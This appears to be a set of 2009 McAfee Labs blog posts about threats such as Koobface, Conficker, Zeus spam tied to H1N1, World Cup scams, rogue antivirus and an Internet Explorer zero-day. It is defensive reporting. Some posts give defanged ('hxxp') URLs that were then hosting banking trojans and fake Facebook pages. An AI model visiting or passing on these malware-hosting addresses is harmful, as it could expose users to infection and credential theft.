With the New Year just days away, it’s time for McAfee Labs 2010 Threat Predictions. What should you be wary of in the coming year? Social networks.

Sites such as Twitter and Facebook have changed the way we communicate, interact, and share on the web. As user bases for the top online social destinations reach record highs, cybercriminals are building out their criminal toolkits, taking advantage of new technologies, third-party applications, and hotspots of activity to exploit users.

What does this mean for the average surfer? Next time you receive an invite from one of your “Facebook friends” to play a game that looks like it’s shaping up to be the next Farmville, think twice before you click. In 2010, users are going to be more vulnerable to attacks that blindly distribute fake apps across their networks. The same goes for bit.ly’s and TinyURLs. As abbreviated URLs become more ubiquitous, it will be even easier for cybercriminals to mask and direct users to malicious sites.

Speaking of ubiquity: McAfee Labs predicts that Adobe will overtake Microsoft as the No. 1 target for cybercriminals in 2010. Adobe products—in particular Acrobat Reader and Flash—have become two of the most widely used apps in the world, and cybercriminals go where the masses go. Cybercriminals will have a field day preying on people using Adobe software.

McAfee also believes the following will play a critical role in 2010:

• Banking Trojans will become even more sophisticated. They showed some firepower in 2009—easily getting around current protections used by banks—but next year they will reach a new level with the ability to interrupt legitimate transactions and make unauthorized withdrawals, while flying under the radar.
• Malware via email attachments will increase, especially targeting corporations, journalists, and individuals
• Botnets, the infrastructure that launches nearly every type of cyberattack, will adopt a peer-to-peer architecture, connecting computer to computer without a centralized control point—making it more difficult for cybersecurity professionals to detect them
• HTML 5 and the evolution of the programming language will give cybercriminals new opportunities to write malware and prey on users

Countering these trends, in 2010 McAfee predicts a good year for law enforcement and the ability to identify, track, and combat cybercrime worldwide. After a decade of cybersecurity research, coordination, and training undertaken by agencies across the globe, the community will reap the benefits of the effort put forth over the past ten years.

McAfee Labs serves up the details on its threat predictions in the full report. Surf the web cautiously in 2010!

(We must correct one oversight: Our colleague Pedro Bueno was one of the authors of the report. His name was inadvertantly left off the document. Thanks, Pedro!)

Koobface has been busy. Activities associated with the worm have increased during the month of December. Often the activity is sending traffic to compromised servers to obtain more servers. Other times it uses those compromised servers to proxy users to malicious domains that distribute more malware or take control of the infected machines.

This morning we noticed a trend: some of the domain-based locations are making use of the holiday theme. This has included everything from “presents for your pets” to “festive holiday trees.” These are domains that appear legitimate but are not. In fact, many of the domains were legitimate at one point but are now are serving a different purpose.

When users go to these these happy holiday sites, they are greeted by having files downloaded to their computers. Then they receive the gift of holiday identity theft!

We have monitored the progress of this attack and its spread throughout the day. Based upon past trends we expect it to continue to evolve and find new servers and methods with similar associations over the next few weeks.

Stay updated and safe over the holidays!

Ketchup stains. Klingons. Exploding monitors. They’re all part of our fiendishly clever new music video, “Hacker’s Holiday.” Pity poor Tiny Tim. He gets a shiny new PC for Christmas and doesn’t bother to protect it. Well, you can guess the rest. A few short days later (12 days maybe?) his PC is ready for the ashcan of history. But how will Tiny Tim exact his revenge? Watch and learn:

And yeah, that’s one guy doing all the sounds, all the singing, all the work. Mister Tim, also star of Enter Kazoo Man and the composer of Star Wars (John Williams is the Man) wrote this little ditty with our help.

If you like it, star it and share it. Thanks! And Happy Holidays from McAfee.

I ran into a few strange IMs over the weekend. When I was not shoveling out my driveway from the 15 inches of snow that covered it I was logged into Facebook telling people about it…. It was then that I started receiving some VERY interesting IMs from a friend extolling the virtues of a clean colon (yep – you read that right):

This lead to the following questionable site, which had some very interesting comments on our SiteAdvisor site:

In short order I also received two more IMs. The first was a video (sound familiar???):

Which lead to a pretty darn good fake Facebook login page (note the SiteAdvisor warning on that page!):

The address this page was hosted on also had a VERY malicious reputation rating from our TrustedSource technology:

Last but not least I got one that included sales pricing for Christmas!!! It is the holidays and scammers certainly like using seasonal trends:

This lead to a really well done “replicas” site with brands such as Rolex, Tiffany, Breitling and others:

I contacted my friend (who was certainly NOT the sending IMs knowingly) and got them fixed up pretty quickly. Not surprisingly it was a Koobface variant on the local machine they were logging into Facebook from.

Facebook is one of the greatest and most popular sites on the Internet today. It has a huge user base, and as such is heavily targeted by scammers and malware writers. Make sure the computer you are accessing it from has up-to-date and properly configured security software!

Yesterday, my colleague Dave Marcus quoted for you the new graphs and stats posted by Shadowserver. Indeed, since November 2008, W32/Conficker (alias Downup, Downadup, Kido) has frequently made headlines. This computer worm has five main variants, which have appeared during the last year. Wikipedia lists the dates: 

• A variant: First appeared 21 November 2008
• B variant: First appeared 29 December 2008
• C variant: First appeared 20 February 2009
• D variant: First appeared 4 March 2009
• E variant: First appeared 7 April 2009  (self-destruction on 3 May 2009)

W32/Conficker spreads via Windows AutoRun feature, drive sharing, and Microsoft vulnerabilities. At the end of 2008, the A and B versions took advantage of a newly discovered Window’s Remote Procedure Call service vulnerability (MS08-067). That’s how Conficker’s masters created a large botnet involving one million unique IPs on a daily basis. The worm used a date-based algorithm to generate 250 domains per day under the generic top-level domain standard. Then infected machines attempted to contact one of these domains in order to install specific malware.

In a similar manner, hosts infected with the C variant generated 50,000 unique URLs ending with a country-code top-level domain and attempted to connect to the first URL that was ready to distribute a digitally signed payload. This third variant also contained peer-to-peer functionality.

The D and E variants were not so prolific; they helped spread the C version as well as other malware (W32/Waledec) and fake anti-virus software.

Estimating the size of the Conficker population is almost impossible. In January, a 10-million hosts figure was frequently quoted in the media. McAfee announced one million unique IPs were alive (or online) each 24 hours, while another security company claimed that at least one out of every 16 PCs worldwide were infected. In March another source said that more than 35 million unique IPs had been botnet zombies since November 2008.

Today the A, B, and C variants maintain a huge foothold worldwide. In October, researchers estimated the number of systems infected topped seven million. Following Dave’s advice, I visited the new Shadowserver statistics page. To illustrate the extent of how this malware affects the world, the organization monitored the Autonomous System Number blocks that have at least one Conficker IP in their network space. The charts highlight the widespread infection and propagation as well as the ratio of infected IP addresses for each autonomous system block.

Shadowserver names 183 country codes and 5994 autonomous systems with Conficker IP in their network space:

• 1086 for the Russian Federation (RU)
• 597 for the United States (US)
• 422 for Ukraine (UA)
• 271 for Romania (RO)
• 244 for Brazil (BR)
• 243 for Republic of Korea (KR)
• 184 for Poland (PL)
• 166 for Bulgaria (BG)
• 147 for Europe (EU)
• 129 for Indonesia (ID)
• 113 for Japan (JP)
• 95 for China (CN)
• 94 for India (IN)

You can also find a Top 500 list for the autonomous systems hosting the largest number of infected IPs as well as the percentage of their entire routed space that is affected by the worm. CHINANET and CHINA169 take the top positions, but with only 1.1 percent and 1.2 percent of unique aggregate IPs. In the 420th position, we discover that 26.36 percent of CHILE S.A.’s routed space is affected by the worm.

If you want to know how your autonomous systems or your country-code top-level domain are positioned, check out the Shadowcrew website.

We don’t really know the objectives of Conficker attacks, even though we can guess the motivations are financial. The consensus in the security community is that it was created to make botnets for hire. The botnet can be rented to criminals who want to send spam, distribute rogue spyware products, steal credentials, and direct users to online scams and phishing sites.

In May, Mike Steward from the Canadian Internet Registration Authority suggested that in the worst case Conficker could become a powerful weapon for causing cyberwarfare that could disrupt not just countries, but the Internet itself.

Our good friends at Shadowserver have recently added some excellent graphs and stats that highlight the continued infections and propagation by the Conficker worm.

Conficker, although it actually does very little, continues to be a major annoyance worldwide, so let’s use these excellent charts and graphs as a reason to revisit two important points:

• Update your systems to current patch levels
• Use up-to-date and properly configured security software. Deploy these at a variety of levels whenever possible. (Layers of defense work better than a single solution.)

Take these two steps and you will be protected against Conficker and a whole lot more. Threats are complex, and combating them really does take layers of defense along with appropriate security technologies. In this age of “blended” and “Web 2.0″ threats, it is wise to incorporate host IPS, network IPS, reputational technologies, and cloud technologies.

The bad guys are always looking for new ways to make their malware and attacks more successful. The good news is we are always working on new technologies to make them less successful.

As outlined in our recent report Mapping the Mal Web, the People’s Republic of China’s top-level domain (.cn) is currently one of the riskiest domain names to surf due to numerous malware downloads and other risky sites. However, this state of affairs may now change for the better:

On December 11 the China Internet Network Information Center (CNNIC), the state network information center of China, released an update regarding its auditing of domain name registrations. As of today, domain name applicants must submit a formal paper-based application when making an online application to the registrar. This includes the original application form with business seal, company business license, and a photocopy of the ID.

This change will make the .cn domain very unattractive for criminals and fraudsters who are looking for domains for which they can register anonymously, preferably paying with stolen credit card information. This would be a great step in making the domain name space of .cn a safer place. And if these measure are implemented as announced, it would in fact make China a leading example in the fight agains fraudsters on the Internet.

I do hope that one small part of the announcement suffered just a bit in translation:

“3. From the day of the submission of online application, if CNNIC does not receive the formal paper-based application material within 5 days or the application material auditing is not qualified, the domain name to be applied will be deleted.”

I hope this means the application, not the domain, will be deleted after being in service for just five days. If not, this has the potential to become “Domain Tasting 2.0.”

The United States is still a safe haven for spammers. With U.S. anti-spam legislation doing very little to thwart spammers and the McColo takedown having only a short-term effect, we have found that due to low-cost and reliable hosting and anonymous domain registration, our country remains the world’s top source for spam.

The December report also reveals:

• “Twitter job” spam, which has been going on for months, is on the rise. It’s a scam that tries to get people to create Twitter accounts and send spam to their followers for money.
• This season’s Christmas-themed malware is focused on the recession, advertising fake luxury goods and brands that are “on sale” through email
• One year after the McColo ISP shutdown, spam has risen beyond the levels before McColo was taken offline
• January 1, 2010, marks the sixth anniversary of the CAN-SPAM Act of 2003, but spam levels have reached record levels in the six years since the legislation passed

Read the report in its entirety here.

Following the latest Captcha techniques used by the W32/Koobface worm, it seems that malware authors have turned to Santa for help to deliver the nasty surprise which awaits Facebook users. The infection drops other Trojans, such as FakeAlert, and leaves the user in trouble.

It all begins with a post on a user’s Facebook wall. If the user clicks on the link, he or she sees a fake video player with a Christmas greeting, as shown below.

A fake message states that to view the video the user must download the latest version of Adobe Flash. If the user clicks “install,” the malware runs a variant of W32/Koobface on the user’s system.  Further, the user’s browser is redirected to more harmful sites harboring malicious files that automatically execute on the infected system.

Among the malicious files that are downloaded and executed are FakeAlert Trojans, which display a fake message stating that the system is infected with various viruses and that the user should buy a product to remove them.

I suggest you avoid installing anything that results from clicking video links related to any Christmas greetings.

Facebook has changed the rules again. Should you be concerned?

On December 9 Facebook rolled out a new feature that was previously announced via an open letter from Facebook founder Mark Zuckerberg. This feature asked users to review their privacy settings to give them more control over who can view the content they publish on the popular social networking site. This change has upset some of Facebook’s users because they see this as an effort by Facebook to get users to make public more of the information that they post. Further, that information will be indexable by search engines such as Bing, which has announced that it will allow searches of status updates posted to Facebook and Twitter. This is a big change for most users, whose current settings may be restricted to family, friends, or groups they’ve joined.

Should users be worried? That depends on what type of information is being posted. Regardless of the privacy policies or the amount of data available to search engines or other users, the ultimate arbiter of what is posted and shared is each user. The service is called social networking for a reason.

Here’s the point: Although users do need to make sure they are aware of the privacy policies of the sites they enjoy and how that information might be used by others, ultimately the users themselves control what is posted online and what applications are installed in their profiles.

If you do not want to share information, do not post it. Once your data gets picked up by search engines, it’s virtually impossible to have it removed. It becomes part of your online brand forever.

We recently alerted our readers to spam campaigns using the H1N1 vaccination program to prompt recipients to open the mail. And we have frequently mentioned that crooks love to take advantage of news, disasters, and other events.

Now that the final draw for the FIFA World Cup in South Africa next year has taken place, it is time to remind you that sports events are no exception to the rule. I’ve already found some examples.

The first is a fake lottery. In this case, the source claims the recipient has won a large sum of money from the South African Football Association. After contacting the lottery manager, the victim of the scam will be asked to pay “processing fees” or “transfer charges” so that the winnings can be distributed. Don’t expect to ever see a payment.

The second example is a “watch live games online” offer. Can you guess it’s a fake? The victims pay to download an HD video player, but they receive only a rogue security product (a.k.a. scareware).

When a sport makes the headlines, there are always fans who want to take part. We’ve also encountered fake club offers that are dedicated solely to collecting subscriptions.

As June 2010 approaches we’re certain these scam offers will increase in number and in professionalism. You must be especially vigilant if you plan to buy tickets online for the South Africa games. Go to fifa.com, use a reputable travel agent, or contact your football/soccer association directly. Don’t assume unsolicited online offers are genuine.

In September, The Times of London wrote that New Scotland Yard had tracked down and closed more than 100 sites so far, with as many as 20 based in Britain. These fraudsters were only the pioneers of an Internet crimewave that will rise as the World Cup approaches.

Here is a screenshot I took today on the official FIFA website. (Prices for the various categories are in US dollars.) The site explains that only one location–fifa.com–will sell tickets and that only a few other companies will sell authorized packages.

Compare the real thing with this suspicious site I also found today. It offers different prices for the same categories:

Don’t be disappointed before your team starts to play. Shop carefully if you plan to buy tickets!

We have just released “Mapping the Mal Web,” our third report revealing the riskiest and safest web domains to surf and search.

For the first time combining data from McAfee’s SiteAdvisor and TrustedSource, the report is even more comprehensive than last year’s, naming Cameroon (.cm) as the riskiest place to surf with a whopping 36.7 percent of the domains posing a security risk.

For those domains for which we had 2,000 or more download tests, we measured the percentage of those tests that were risky. Romania (.ro, 21.0 percent), China (.cn, 18.6 percent), and the generic .info (15.2 percent) were found to be most risky, leading by the fourth place finisher, .biz, by a wide margin (6.8 percent).

This report also shows how much the Registrars can achieve when they try. Last year Hong Kong (.hk) was the most risky domain to surf. After taking appropiate actions, their efforts paid off: With just 1.1 percent this year, they have dropped to 34th place. Congratulations to everyone involved!!

That’s enough numbers for now. Get the full report here or find a summary over here.

The report is available in several other languages from the McAfee home page, and to help you avoid risky sites I strongly recommend our free SiteAdvisor.

On December 1st McAfee Labs detected an outbreak of a spam mail pretending to be from the CDC and using the H1N1 virus to facilitate the distribution of a Zeus Trojan executable. The email claims that the CDC is requiring all people to fill out a “vaccination profile” online.

This email has been associated with the following subjects, but there are likely to be more as the campaign progresses:

Governmental registration program on the H1N1 vaccination
State Vaccination H1N1 Program
Your personal Vaccination Profile
Create your personal Vaccination Profile
State Vaccination Program
Creation of personal Vaccination Profile
Instructions on creation of your personal Vaccination Profile
Creation of your personal Vaccination Profile

These emails contain a url that points to a website which urges the victim to download a vaccination profile archive:

The link is an executable that installs a VERY recent Zeus trojan variant. Zeus is an easy-to-use tool for constructing trojans and has been associated with numerous botnets. As of the time of this writing, McAfee is among only a handful of AV engines that detects this strain (7/41 engines detected it according to VirusTotal, and McAfee had 2 of those 7 engines).

The domains in the email were registered or updated a week before the campaign began. The whois information associated with the domains indicate that most of them were registered with a Belgium registrar at active24.be.

The DNS servers that are authoritative for the spam domains were purchased from a Chinese registrar “Xin Net Technologies”, but the DNS servers themselves are being hosted from locations in the US, Japan and Hong Kong. We even see some of the dns servers being used as previously having been associated with sending spam mail for the Cutwail botnet, which has been known to use the Zeus Trojan. This could indicate the possibility that some the dns servers themselves may simply be infected hosts.

These hostnames are associated with 135 distinct IP addresses associated with the websites hosting the Trojan, which stem from all over the world and appear to be dsl accounts.

The primary countries hosting the websites at the time of this writing are in Colombia, Brazil, India, Malaysia, Chile and Argentina.

Stay updated and stay safe!!

National unemployment rates over 10% and the pressures of the holiday shopping season make for a dangerous cocktail that the cyber criminals can take advantage of.  Fears of not being able to pay the monthly mortgage, car payments, backed up bills, and providing for your children for the holidays have put many people into situations that they never thought they would find themselves in. This has caused many to become desperate and vulnerable as the try to make ends meet.  Cyber criminals are always looking to take advantage of vulnerable situations as a way to dupe people into giving up your sensitive information.  In addition to obviously being criminals, I always say that cyber criminals are also great marketers!

To that point, be on the lookout for many different types of scams this holiday season (check out our recently published “12 Scams of Christmas“) including get rich quick schemes and work from home opportunities that are really just covers for phishing scams or attempts to inject malware onto your computer.

We are monitoring a couple such scams arriving via email which are linking off to Twitter updates or free blogging services like Google’s Blogspot:

As the holiday season progresses, we will see more of these types of scams popping up with themes ranging from holiday sales and rebate opportunities to holiday e-cards which actually install malicious applications instead of the holiday card!.  One bit of advice that we ask users to follow is that if you are interested in the latest deals and bargains being offered by your favorite online retailer this holiday season, go to the web site directly by typing their web site into your browser.  Do not click on a link in an email or instant message to get you there because the link might actually be masked to go to a lookalike site setup by cyber criminals to steal your personal information.  If the offer that arrived in your inbox is legitimate it will be honored on the web site if you browse there manually as opposed to clicking a link that arrived in your inbox.

Have a safe and malware free holiday season!

Security breaches, laptop theft, and identity theft happen all the time, and these crimes increase every year. The need for people to become more aware of their digital presence and the threats surrounding it is vital.

The pace at which these threats increase is much faster than our awareness grows, making a bad situation. One way to improve matters is to implement security-awareness programs in colleges and universities.

Why choose colleges? Higher education institutions are an ideal platform for spreading security awareness because they produce so much of our future workforce. With computers everywhere in businesses, it’s essential that these graduates learn about the invisible threats that face them and their employers’ information.

Another benefit of focusing on colleges and universities is that this environment provides both a very good learning atmosphere and people working in many fields. Thus a security-awareness program will benefit not only students in the computer or business fields, but also in medical, environmental, media, and many more disciplines.

Hot Topic: Identity Theft
College students are attractive targets for identity thieves because they generally have clean credit records, allowing thieves to easily take out loans in their names. Many students may also not realize the potential for fraud and do not guard their personal information as closely as they should. Student’s social security numbers, email IDs, and addresses may be listed on everything from identification cards to report cards, which this information readily available to enterprising thieves. Universities and colleges have also come under attack from hackers in recent years, due to the value of the information they store.

What are some aspects of identity theft? Here are some figures from a 2009 study by Javelin Strategy & Research Center:

• Identity theft is on the rise, affecting almost 10 million victims in 2008. That’s a 22 percent increase from 2007.
• Victims are spending less money to correct the damage from identity theft. The mean cost per victim is $500, and most victims pay nothing due to zero-liability fraud-protection programs offered by their financial institutions.
• 71 percent of fraud happens within one week of the theft of a victim’s personal data
• Low-tech methods for stealing personal information are still the most popular for identity thieves. Stolen wallets and physical documents accounted for 43 percent of all identity theft, while online methods accounted for only 11 percent.

Types of Identity Theft
Identity theft can happen to anyone, and it can come in all shapes and sizes. For example, your credit card number could be stolen and used to make online purchases, a thief could impersonate you to open up a loan in your name, a felon could commit a crime and pretend to be you when caught, or someone could use your personal information to apply for a job.

Here’s a chart describing kinds of identity theft, based on Federal Trade Commission complaint data:

Students should protect themselves by detecting and resolving identity thefts. Here are some general tips to minimize the risk of identity theft:

• Check credit card statements regularly. Students should examine their financial statements at least once per month for any unusual activity. A credit-monitoring service can be a valuable tool in fighting identity theft, as it would alert them if any new accounts are opened in their names.
• Use strong passwords. If remembering many passwords is too difficult, create a few strong ones that include numbers, capital letters, and special characters such as ^ or *. Most important, do not share your passwords, debit or credit card PINs, or leave lying about any papers or unlocked computers with personal information.
• Protect your computer. It a good practice to enable all security features and keep your anti-virus and spyware protection up to date. Use a password-enabled lock (such as a screen saver) on your computer in case you leave it running while you are not present.
• Don’t swallow the bait. College students, though technically savvy, can fall victim to scams. Beware of phishing attempts that ask you to update personal data such as social security numbers and bank account information. The senders are trying to steal your data to commit fraud. Students should also watch out for fake anti-virus tools that claim your computer is infected and insist you run a “scan” to find malware. Use McAfee SiteAdvisor to check if you are surfing safely.

We discussed in a recent blog how Google Reader has become an unwitting spam target. We now see the same behavior in a recent variant of Koobface. This variant uses the Google Reader page to host the malware. Once the user selects the Google link, a fake YouTube window appears, as shown below.

When the user tries to play the YouTube video, the webpage gets redirected to:

hxxp://www.hs-limmattal.ch/{blocked}/

which pretends to be a Facebook help center page that, in an ironic twist, displays information on how to protect against the Koobface worm!

The user is then asked to download a setup file that purports to be a free anti-virus scanner. The file size is said to be 32.39MB, whereas the one actually downloaded is only 40.5KB in size. The download doesn’t stop here. The malware keeps on downloading many components that support it. It also checks for the latest copy of itself and downloads as needed.

This variant of Koobface also tracks the cookies on the user’s machine and tries to send them to a remote server.

One more trick the malware uses is it tries to break Captcha and then uses it to register for another Facebook account. The infected machine shows a Captcha window and then tries to deceive the user by showing the time out for shutdown. Koobface, however, does not shut down the user’s machine when the countdown timer finishes. Instead the user’s machine is locked until the Captcha is entered successfully.

After the user enters the Captcha correctly, a JPEG image of the Captcha is sent to the remote server (as shown in the image below):

The malware keeps asking for a response from the remote server; once it receives the response, a new account gets created. The account can be used for spamming or for any other activity as desired by the attacker. The same tactic is used for infecting Twitter, MySpace, and hi5 (all popular websites):

This new method of account creation is cheap, and there are dedicated Captcha administrators who will do this work for just a few cents.

This worm steals email credentials, FTP credentials, and IM application credentials. The encrypted stolen data is sent to the Trojan’s command and control server. The worm has also redirected user searches.

To get rid of the locked machine, users can follow this process:

• Press Ctrl+Alt+Del
• Go to Task Manager
• Then select Processes
• In Processes search for RUNDLL32.exe

• End that process

• Search for processes with names rdr_xxxxxxxx. End these processes as well.

These steps will kill the malware processes that are running the user’s machine and will unlock the machine.

McAfee Labs reminds users not to click on YouTube links from unknown sources and to not accept any requests from unknown users!

No matter how sophisticated security gets, we still need to handle the basics properly. One of the most basic tasks is to create and use secure passwords. You need them to log onto your computer, reach internal applications, and enter just about every website you visit. They are pervasive in our connected world.

But how many of us give any real thought to how secure our passwords are? Because we use them so often, we’re tempted to reuse the same one over and over again. However, as your mother might say, that’s a poor decision. Here are pros and cons of several common password techniques, and a simple-to-remember method that is both easy for you and hard for hackers.

Frequency and complexity
Our decisions about passwords are often some balance of frequency and complexity. The more frequently we use a password, the easier it is to remember it; and the more complex the password is, the less likely we will be able to remember it. This difficulty leads many people to use the same password for all their online accounts. Banking, auction, and social networking sites could have the same password for the same account name. In such a situation a hacker who compromises a single website can get the username and password for all of your accounts. It is important for people to remember that their website passwords are owned by that website, not by the individuals who entered them. Thus giving a website a password that accesses other accounts is not the best way to maintain security.

Users should avoid any password that can be cracked by a dictionary attack. If your password can be found in an unabridged dictionary, then it can be “guessed” by having a computer program try them all out. “123456” is not adequate to avoid a dictionary attack because it is the most commonly used password in existence. Using profanity may make talking about the password unacceptable in polite conversation, but that social boundary will not stop someone willing to breaking the law to steal your identity.

Password habits
Most people’s password habits fall into one of three categories:

• The global password. Many people use the same password everywhere. This is the worst password method; it means that someone who hacks a website that you bought something from years ago can now get into all your most frequently used accounts.
• The short list of passwords. Others create a hierarchical list of passwords that they reuse. This allows them to use their most complex password for financial websites, a simpler password for websites where items are purchased, and another password for social networking websites. This is exponentially better than the single global password, but exponentially better than “worst” is still not good.
• The black book of passwords. Some people choose a unique password for every website they visit, but because of the huge list of passwords they need to remember, they all are written on a pad of paper kept near the computer. This is not only unwieldy and not flexible (if you go on vacation and forget it), but you can lose the list or have it stolen by someone who gains brief access to your office or computer. Many corporate environments that force people to constantly change their passwords are littered with passwords on sticky notes or on paper in a drawer that is accessible by coworkers, cleaners, or burglars.

Creating your password algorithm
In creating passwords we want to maximize complexity and eliminate repeating passwords without adding any additional stress to our brains. To do this we need an internal algorithm that will generate a unique, difficult-to-guess password for every website we visit. The algorithm needs to be repeatable, so that remembering the passwords is not important: All we need to remember is the algorithm that generates the password. Thus we need to take something about to ourselves, add something unique about the website in question, and modify that information so that the algorithm is not obvious to anyone looking at the password.

Here is an example of a password for mcafee.com.

My token: light
The website: mcafee.com
The password: 123l1ghTjdqr33^!

In spite of the password’s complexity, the algorithm here is relatively simple. We start with “123,” and then add the word “light” with the “i” replaced with the number 1 and a capital “T” at the end. We add “jdqr33,” the letters (and numbers) above the word “mcafee” on my keyboard. We finish off with a bang—“^!”—to make sure we include some special characters.

Here’s another password with the same token and website:

The password: LlIiFCM999gh+

That’s the “li” in “light,” but with an upper and lowercase of each, then capitalized consonants from “mcafee” written backward, a few 9’s, and a “ght” with the “t” replaced by a plus sign.

Your algorithm can be anything you want, but you should choose one that includes numbers, letters (both capital and lowercase), as well as special characters. Some password validation algorithms don’t accept special characters, and others require you to start with a letter. These can be your second and third tries if you don’t get it on the first. Having a good password algorithm prevents someone from getting one password and using it on all your accounts, it also makes your password hard to guess, and it doesn’t require you to carry around a list of passwords.

In the case where your office administrator forces you to change your password frequently, you need only to write down the website token instead of the full password. So even if people find your little black book of passwords, they’ll be lost without the algorithm.

Information regarding another zero-day vulnerability in the Internet Explorer web browser affecting version 6 and 7 has been published as Proof-of-Concept over the weekend. The vulnerability lies in a missing check when accessing a website’s Stylesheet markup information through the „getElementsByTagName“ script method. The current PoC exploit uses heap-spraying to write the malicious shellcode to memory before triggering the vulnerability. While exploits for this new vulnerability may not yet be in-the-wild (beyond PoC state), you can be sure that the malware community will be working overtime to ensure reliability and maximum effect. The underground community rapidly turn these proof of concepts into working exploits to add to their Web exploit toolkits, differentiating their product from the competition – especially when there is no patch available from Microsoft to mitigate the risk.

Web Exploits continue to be the preferred attack mechanism of choice, with many organisations challenged by managing the number of patches for the browser and associated plug-ins, making it an effective attack vector for the malware authors. We have seen increasingly complex JavaScript mechanisms to attempt to evade detection – please ensure you have appropriate protection against this contemporary attack vector.

Recommendations to disable scripting in your browser may help to protect from this new threat, but simply is not realistic in the Web 2.0 world in which we now browse in. McAfee protects its customers against the current PoC exploit, blocking it proactively as “JS/Exploit-BO.gen” in VirusScan and as “BehavesLike.JS.Suspicious.A” at the Web Gateway with McAfee Gateway-Anti-Malware.

It is the time of year to get together with family and friends, and that often involves flying. So, how about a promotional airline ticket for just $1?

That sounds like an irresistable idea! Though it also sounds too good to be true. As you can imagine, there is something wrong here. Instead of flying for a buck, you may end up with several fewer hundred dollars in your bank account.

This example is the most recent seasonal spam targeting Brazilians. In the image below you can see the pitch.

When you click on the image, which is hosted at hxxp://dhroot.hpg.com.br/images/danosse.jpg, you’ll follow a link that will attempt to download a Trojan from hxxp://www.medcitybuilders.com/plugins/system/[REMOVED]/. This Trojan is a downloader that will copy a password-stealing malware that targets the customers of Brazilian banks. The malware is currently hosted at hxxp://www.radfahrschule.at/html/modules/PagEd/browsepics/[REMOVED].

In Brazil we say “there is no such thing as free dinner.” In the States there’s no free lunch. In this case we can also see that there are no free air tickets.

A common challenge of cybercrime investigations is the need to conduct forensic analysis on a computer before it is powered down and restarted. As some active system processes and network data are volatile and may be lost after the computer is turning off, investigators were in search of a tool that could assist them in the very limited space of time they may have to investigate a crime. It is for this reason, that in October, Microsoft and the National White Collar Crime Center (NW3C) announced an agreement establishing NW3C as the first U.S.-based distributor of the Computer Online Forensic Evidence Extractor (COFEE).

Recently there seems to be a leak of the software onto the Internet. On Tuesday November 10, someone using the pseudonym DrWeird of Eti.in posted the documentation and a working build from Version 1.1.2 online.

Here are some details I collected from one of the posted manuals.

Working on Windows XP, COFEE consists of three major components: the GUI for the investigator, the command‐line application to be executed on the target machine, and the individual tools that are managed by COFEE and the command‐line application. As explained in the manual, the execution process is divided into three phases: tool generation, data acquisition, and report generation.

During the tool generation phase, digital forensics specialists can select tools to run against a target machine based on the individual case requirements. They can do this by either selecting a predefined profile, or by manually creating a profile and selecting which tools (including switches) to run against the target machine.

Two predefined profiles were developed to help investigators during the generation phase. The first is the Volatile Data Profile, which carries out a full forensic examination. None of the programs makes any direct writes to the suspect’s file system. The second, the Incident Response Profile, can be used when an investigator cannot perform a forensic analysis on the target machine. This profile is designed to have minimal impact on the suspect’s file system.

After “brewing” a cup of COFEE, investigators insert the USB device into the target machine. The data acquisition phase runs and all collected data will be stored on the USB stick.

After data collection, investigators can start the report generation phase by loading that information into the GUI console on the investigator’s machine and generate a report.

In the past, I pointed out that if law enforcement created dedicated tools, that one of these days they will certainly fall into crooked hands. These hands will be happy to study and re-use them for their own porpuses. The detection policies for the original piece of codes as well as its existing and potential future variants is still much debated. Today the disclosed program is not so sensitive; it is merely a repackaging of known utility tools many have been using for a long time. But this leak must remind us that people will use the same tools for very different reasons and goals.

One year ago today email administrators were astonished to notice the amount of spam hitting their mail servers had plunged precipitously. Email volumes dropped off as much as 60 percent to 70 percent, and the reason wasn’t immediately obvious to anyone except for the folks who knew that McColo, a major spam-hosting ISP had been taken offline. Three of the largest spam-sending botnets at the time–Rustock, Srizbi, and Mega-D–had command and control machines hosted at McColo and were drastically affected. Mega-D’s volume dropped by more than 95 percent and Srizbi volumes dropped by more than 80 percent.

However, only days after McColo was taken offline, it was reconnected for a brief period–about 12 hours–by its uplink provider, giving just enough time for the Rustock botnet owners to recommunicate with their infected machines and point the command and control centers to other service providers. Rustock quickly regained its status as a top spam distributor. The Mega-D botnet owners also bounced back until it was shut down just this past week. Srizbi, which once accounted for more than 50 percent of spam volume, never recovered and is no longer a factor in today’s spam wars.

What has happened since McColo was shut down? Did spam volumes ever recover from the loss of three of the largest spam-sending botnets? Not only did spam volumes recover, unfortunately, but they recovered quickly and have greatly surpassed the volumes that we saw before McColo was taken offline.

You can see in the preceding graph where volumes stood and how they dropped off after McColo was cut off. However, the shutdown’s effect was brief and ultimately small. We have seen dramatic increases since then due to the relaunching of botnets such as Rustock as well as new botnets such as Bredo (which primarily sends fake nondelivery notifications spoofing package delivery services like FedEx, DHL, and UPS) and Waledac (the rebirth of the Storm botnet). Spam volumes have more than doubled since just February 2009, dwarfing several times over the decreases due to McColo’s demise.

The McColo closure as a single event remains significant, but when you compare it with the huge increases in volumes that we have seen since then–because of increased spoofs against social media sites through viruses like Koobface and spam continuing to be major factors in the successes of Rustock and Cutwail–the decrease now reflect only a momentary blip on the radar. 

Nonetheless, you should expect to see more of these types of takedowns as security researchers and research organizations continue to get involved, but you should also expect the overall effect of those shutdowns to be temporary. McColo has taught botnet owners a lesson. As a result botnet control centers have become more distributed, spanning many networks in many countries. Today taking down a big hosting provider would prove only a minor inconvenience as opposed to a major victory for security forces.

How good are you at identifying a genuine security product from an imposter that claims to offer protection? If you think you are good at it, then have a look at the images below.

[ Legitimate McAfee site]

[Rogue Anti-Virus MaCatte site]

Recently we have seen the rapid growth of rogue anti-virus/spyware programs. This one is especially interesting. Why? Because it mimics McAfee’s security product. This rogue software displays the same user interface as McAfee Security Center. It also offers a web page that looks similar to McAfee’s legitimate site.

I suppose we should be flattered that malware authors have chosen our product as one worth imitating. Rogue anti-virus products have long mimicked Microsoft’s security apps in Windows XP (FakeAlert-XPSecCenter) and Windows Vista/Windows 7 (FakeAlert-EA).

The idea behind fake AV software is to trick unsuspecting users into thinking their machines are infected. The malware will display a window that shows many innocent files detected arbitrarily as compromised. These fake security alerts are baseless–they exist to trick victims into pressing the panic button. In this case agreeing to “Remove all threats now” will lead to purchasing the MaCatte Antivirus 2009 product. The rogue software offers several “features”:

[MaCatte SecurityCenter image]

And that’s not all–MaCatte Antivirus 2009 will block currently installed or downloaded anti-virus software. It will redirect your browser to various misleading websites, including the rogue program’s homepage, www.macatte.com.

Once installed, MaCatte Antivirus will start automatically when you boot Windows. Then it will scan your computer and display numerous infections, but will not remove them until you first purchase the program.

The cost of cleaning the “malicious” files comes at the rip-off price of $99. Leading legitimate anti-virus security products don’t come close to the cost of this imposter. I hope that’s an eye opener for you. Don’t become a victim.

